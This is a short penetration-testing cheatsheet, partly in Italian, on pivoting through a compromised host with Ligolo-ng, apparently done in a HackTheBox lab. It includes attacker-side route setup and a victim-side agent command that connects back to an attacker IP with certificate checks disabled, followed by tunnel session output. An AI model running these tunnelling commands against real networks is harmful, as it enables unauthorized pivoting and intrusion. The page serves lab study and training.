Ligolo-ng

Download proxy and agent form github https://github.com/nicocha30/ligolo-ng

On attacker machine

setup

sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up

route on ip

sudo ip route add 172.16.1.0/24 dev ligolo
sudo ip route add 240.0.0.1/32 dev ligolo # local port forwarding

➜  ligolo-ng_proxy_0.7.5_linux_amd64 git:(master) ✗ sudo ./proxy -selfcert
[sudo] password for kali: 
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC! 
WARN[0000] Using self-signed certificates               
WARN[0000] TLS Certificate fingerprint for ligolo is: 40ACCAE48149074DBBA0313961C2F2AB269FF492EE8FA89F3E2C3D2222323A0C 
INFO[0000] Listening on 0.0.0.0:11601

On victim

                                 
./agent -ignore-cert -connect 10.10.14.13:11601 
WARN[0000] warning, certificate validation disabled     
INFO[0000] Connection established                        addr="10.10.14.13:11601"

After la connessione

create interface

ligolo-ng » interface_create --name "evil-cha"

Creating a new "evil-cha" interface...       
INFO[0009] Interface created!

select session

ligolo-ng » session
? Specify a session : 1 - root@DANTE-WEB-NIX01 - 10.10.110.100:57614 - a0a78982-645b-46db-b759-20fa6185240a

start tunnel

[Agent : root@DANTE-WEB-NIX01] » tunnel_start
[Agent : root@DANTE-WEB-NIX01] » INFO[0270] Starting tunnel to root@DANTE-WEB-NIX01 (a0a78982-645b-46db-b759-20fa6185240a)

Local Port Forwarding

sudo ip route add 240.0.0.1/32 dev ligolo

Ora si può accedere alla porta remota local utilizzando 240.0.0.1 e il numero della porta

Risorse

https://software-sinner.medium.com/how-to-tunnel-and-pivot-networks-using-ligolo-ng-cf828e59e740
https://docs.ligolo.ng/Quickstart/
https://www.youtube.com/watch?si=tua3i2c3Y0hgN5XP&v=DM1B8S80EvQ&feature=youtu.be
https://arth0s.medium.com/ligolo-ng-pivoting-reverse-shells-and-file-transfers-6bfb54593fa5

PreviousmSFVenom Cheatsheet NextRubeus

Last updated 3 months ago